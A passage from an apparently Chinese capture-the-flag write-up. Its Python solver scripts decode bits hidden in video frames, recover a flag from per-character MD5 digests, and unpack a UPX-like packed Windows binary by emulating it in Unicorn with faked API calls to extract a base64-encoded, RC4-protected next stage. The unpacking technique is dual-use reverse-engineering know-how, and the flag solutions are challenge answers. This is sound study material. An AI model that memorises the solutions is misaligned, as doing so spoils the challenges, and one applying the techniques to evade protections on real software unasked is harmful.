            # Sample the cell centre so that compression artefacts at the
            # cell borders do not flip the bit.
            pixel = frame[y, x]
            bit_chunks.append("1" if np.mean(pixel) < 128 else "0")
cap.release()

bits = "".join(bit_chunks)


# Undo the encoder's per-byte XOR; an incomplete trailing group is dropped.
xor_key = "10101010"
key_int = int(xor_key, 2)
usable = len(bits) - len(bits) % 8
data = bytearray(int(bits[i:i + 8], 2) ^ key_int for i in range(0, usable, 8))


# The context manager guarantees the output file is flushed and closed.
with open("1", "wb") as out_file:
    out_file.write(data)
PYTHON
import hashlib


# Each line is the MD5 hex digest of a single character of the flag.
strs = """8277e0910d750195b448797616e091ad
0cc175b9c0f1b6a831c399e269772661
4b43b0aee35624cd95b910189b3dc231
e358efa489f58062f10dd7316b65649e
f95b70fdc3088560732a5ac135644506
c81e728d9d4c2f636f067f89cc14862c
92eb5ffee6ae2fec3ad71c777531578f
c4ca4238a0b923820dcc509a6f75849b
8fa14cdd754f91cc6554c9e71929cce7
c9f0f895fb98ab9159f51fd0297e236d
336d5ebc5436534e61d16e63ddfca327
eccbc87e4b5ce2fe28308fd9f2a7baf3
cfcd208495d565ef66e7dff9f98764da
a87ff679a2f3e71d9181a67b7542122c
e4da3b7fbbce2345d7772b0674a318d5
e1671797c52e15f763380b45e841ec32
8f14e45fceea167a5a36dedd4bea2543
1679091c5a880faf6fb5e6087eb1b2dc
4a8a08f09d37b73795649038408b5f33
cbb184dd8e05c9709e5dcaedaa0495cf""".splitlines()


# Digest -> character table for code points 0..255 inclusive.
# (The previous range(0, 255) stopped at 254 and left out code point 255.)
maps = {hashlib.md5(chr(i).encode()).hexdigest(): chr(i) for i in range(256)}


# Print the recovered characters on one line; an unknown digest raises KeyError.
print("".join(maps[s] for s in strs), end="")

re2

类似upx的壳。解压完了走这个地方0x4014E0跳出。

没带windows只能unicorn跑了。需要模拟几个系统函数。

PYTHON
# Excerpt from the full script below: addresses inside the fake API region
# (api_base is defined there) at which each imported function is intercepted.
api_stubs = {
    "LoadLibraryA": api_base + 0x100,
    "ExitProcess": api_base + 0x200,
    "GetProcAddress": api_base + 0x300,
    "VirtualProtect": api_base + 0x400,
    "exit": api_base + 0x500,
}

能取出来一个base64。解码是下一个stage。

PYTHON
import base64
import struct
import os
import pefile
from unicorn import Uc
from unicorn.x86_const import *
from unicorn.unicorn_const import *


# Output directory for the extracted next stage.
os.makedirs("out", exist_ok=True)


# Parse the packed executable and keep its raw bytes for manual mapping.
packed_pe = pefile.PE("challenge.exe")
packed_image = open("challenge.exe", "rb").read()
packed_base = packed_pe.OPTIONAL_HEADER.ImageBase
# Image size rounded up to a whole number of 4 KiB pages.
packed_size = (packed_pe.OPTIONAL_HEADER.SizeOfImage + 0xFFF) & ~0xFFF


# Map the image into a 64-bit x86 emulator: headers first, then each
# section's raw data at its virtual address.
mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(packed_base, packed_size)
mu.mem_write(packed_base, packed_image[: packed_pe.OPTIONAL_HEADER.SizeOfHeaders])
for packed_section in packed_pe.sections:
    packed_raw = packed_image[
        packed_section.PointerToRawData : packed_section.PointerToRawData + packed_section.SizeOfRawData
    ]
    # Sections without raw data are left as mapped by mem_map.
    if packed_raw:
        mu.mem_write(packed_base + packed_section.VirtualAddress, packed_raw)


# 2 MiB stack; RSP starts 0x10000 bytes below the top of the mapping.
stack_base = 0x01000000
stack_size = 0x00200000
mu.mem_map(stack_base, stack_size)
mu.reg_write(UC_X86_REG_RSP, stack_base + stack_size - 0x10000)


# Region holding fake API entry points; each stub is a single RET (0xC3).
api_base = 0x03000000
mu.mem_map(api_base, 0x00020000)
api_stubs = {
    "LoadLibraryA": api_base + 0x100,
    "ExitProcess": api_base + 0x200,
    "GetProcAddress": api_base + 0x300,
    "VirtualProtect": api_base + 0x400,
    "exit": api_base + 0x500,
}
for api_stub in api_stubs.values():
    mu.mem_write(api_stub, b"\xC3")


# Point the import table entries of the stubbed functions at their stubs.
# Imports without a name and imports that are not stubbed are left untouched.
for import_entry in packed_pe.DIRECTORY_ENTRY_IMPORT:
    for import_symbol in import_entry.imports:
        if not import_symbol.name:
            continue
        import_name = import_symbol.name.decode()
        if import_name in api_stubs:
            mu.mem_write(import_symbol.address, struct.pack("<Q", api_stubs[import_name]))


# Shared emulation state:
#   state["stop"]      - set by the code hook when emulation should end
#   state["next_fake"] - next free address for a GetProcAddress result
state = {"stop": False, "next_fake": api_base + 0x1000}
# DLL name -> fake module handle returned by LoadLibraryA.
dll_handles: dict[str, int] = {}
# (module handle, symbol name) -> fake function address.
symbol_addrs: dict[tuple[int, str], int] = {}
# Fake function address -> symbol name, used to dispatch calls in the hook.
addr_to_name: dict[int, str] = {}




def _read_c_string(mu: Uc, address: int) -> str:
    """Read a NUL-terminated byte string from emulated memory, decoded as latin1."""
    collected = bytearray()
    while True:
        current = mu.mem_read(address, 1)[0]
        if current == 0:
            break
        collected.append(current)
        address += 1
    return collected.decode("latin1")


def _return_to_caller(mu: Uc, result: int) -> None:
    """Emulate a ``ret`` from a stubbed API: pop the return address, set RAX, jump back."""
    rsp = mu.reg_read(UC_X86_REG_RSP)
    ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
    mu.reg_write(UC_X86_REG_RSP, rsp + 8)
    mu.reg_write(UC_X86_REG_RAX, result)
    mu.reg_write(UC_X86_REG_RIP, ret_addr)


def on_code(mu: Uc, address: int, _size: int, user_data: dict) -> None:
    """Per-instruction hook that stops at the unpacker's exit and fakes API calls.

    Args:
        mu: the emulator instance.
        address: address of the instruction about to execute.
        _size: instruction size (unused).
        user_data: the shared ``state`` dict; ``"stop"`` is set when emulation
            ends and ``"next_fake"`` allocates GetProcAddress results.

    Behaviour by address:
      * 0x4014E0: stop emulation.
      * LoadLibraryA / GetProcAddress / VirtualProtect stubs: emulate the call
        and return to the caller.
      * ExitProcess / exit stubs: stop emulation.
      * an address handed out by the fake GetProcAddress: return a canned
        value for the named function (0 for names not listed below).
    Any other address is executed normally.
    """
    if address == 0x4014E0:
        # Fixed: this line used to print an undefined name ``stop``, which
        # raised NameError exactly when the target address was reached.
        print("reached 0x4014E0")
        user_data["stop"] = True
        mu.emu_stop()
        return

    if address == api_stubs["LoadLibraryA"]:
        print("called LoadLibraryA")
        # First argument (RCX) points to the DLL name.
        dll_name = _read_c_string(mu, mu.reg_read(UC_X86_REG_RCX))
        # Every distinct DLL name gets its own fake handle, reused on repeat.
        handle = dll_handles.setdefault(dll_name, api_base + 0x8000 + len(dll_handles) * 0x100)
        _return_to_caller(mu, handle)
        return

    if address == api_stubs["GetProcAddress"]:
        print("called GetProcAddress")
        # Arguments: RCX = module handle, RDX = pointer to the symbol name.
        handle = mu.reg_read(UC_X86_REG_RCX)
        symbol_name = _read_c_string(mu, mu.reg_read(UC_X86_REG_RDX))
        symbol_key = (handle, symbol_name)
        if symbol_key not in symbol_addrs:
            # Allocate a new 0x10-byte slot filled with RET bytes and remember
            # which symbol it stands for.
            fake_addr = user_data["next_fake"]
            user_data["next_fake"] += 0x10
            symbol_addrs[symbol_key] = fake_addr
            addr_to_name[fake_addr] = symbol_name
            mu.mem_write(fake_addr, b"\xC3" * 8)
        _return_to_caller(mu, symbol_addrs[symbol_key])
        return

    if address == api_stubs["VirtualProtect"]:
        print("called VirtualProtect")
        # Fourth argument (R9) is the optional pointer receiving the old
        # protection; report 0x20 and return success.
        old_protect_ptr = mu.reg_read(UC_X86_REG_R9)
        if old_protect_ptr:
            mu.mem_write(old_protect_ptr, struct.pack("<I", 0x20))
        _return_to_caller(mu, 1)
        return

    if address in (api_stubs["ExitProcess"], api_stubs["exit"]):
        print("called ExitProcess")
        user_data["stop"] = True
        mu.emu_stop()
        return

    if address not in addr_to_name:
        return

    # A function resolved through the fake GetProcAddress is being called.
    fake_name = addr_to_name[address]
    fake_result = 0
    if fake_name == "GetCurrentProcess":
        fake_result = 114514
    elif fake_name in {"GetCurrentProcessId", "GetCurrentThreadId", "GetTickCount"}:
        fake_result = 1
    elif fake_name == "QueryPerformanceCounter":
        out_ptr = mu.reg_read(UC_X86_REG_RCX)
        mu.mem_write(out_ptr, struct.pack("<Q", 1))
        fake_result = 1
    elif fake_name == "GetSystemTimeAsFileTime":
        out_ptr = mu.reg_read(UC_X86_REG_RCX)
        mu.mem_write(out_ptr, struct.pack("<Q", 0))
    elif fake_name == "GetStartupInfoA":
        # Zero 0x68 bytes at the output pointer.
        out_ptr = mu.reg_read(UC_X86_REG_RCX)
        mu.mem_write(out_ptr, b"\x00" * 0x68)
    elif fake_name == "GetModuleHandleA":
        fake_result = packed_base
    elif fake_name in {
        "VirtualQuery",
        "RtlAddFunctionTable",
        "InitializeCriticalSection",
        "DeleteCriticalSection",
        "EnterCriticalSection",
        "LeaveCriticalSection",
        "SetUnhandledExceptionFilter",
    }:
        fake_result = 1

    _return_to_caller(mu, fake_result)




# Run the packed entry point until the hook stops emulation.
mu.hook_add(UC_HOOK_CODE, on_code, state)
mu.emu_start(packed_base + packed_pe.OPTIONAL_HEADER.AddressOfEntryPoint, 0)


# Snapshot the first 0x15000 bytes of the unpacked image.
loader_dump = bytes(mu.mem_read(packed_base, 0x15000))


# Search for the start of the embedded base64 blob (the prose above says it
# decodes to the next stage).
blob_start = loader_dump.find(b"TVqQAAMAAAAEAAAA//8A")
print(blob_start)
if blob_start < 0:
    # find() returns -1 on a miss; carrying on would slice from the wrong end.
    raise SystemExit("base64 blob not found in the unpacked image")


# Extend the blob while the bytes stay inside the base64 alphabet.
# The alphabet must be a bytes object: indexing ``loader_dump`` yields ints,
# and testing an int against a str raises TypeError.
base64_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
blob_end = blob_start
while blob_end < len(loader_dump) and loader_dump[blob_end] in base64_alphabet:
    blob_end += 1


stage2_enc = base64.b64decode(loader_dump[blob_start:blob_end])
# The context manager guarantees the file is flushed and closed.
with open("out/stage2.exe", "wb") as stage2_file:
    stage2_file.write(stage2_enc)

这里做了一次解密。

进去扫一眼大概就知道rc4了。

rc4 key在0x4070C0。可以直接跑,跑完就有.rdata和.hello里的内容。

comment

留言 / 评论

如果暂时没有看到评论,请点击下方按钮重新加载。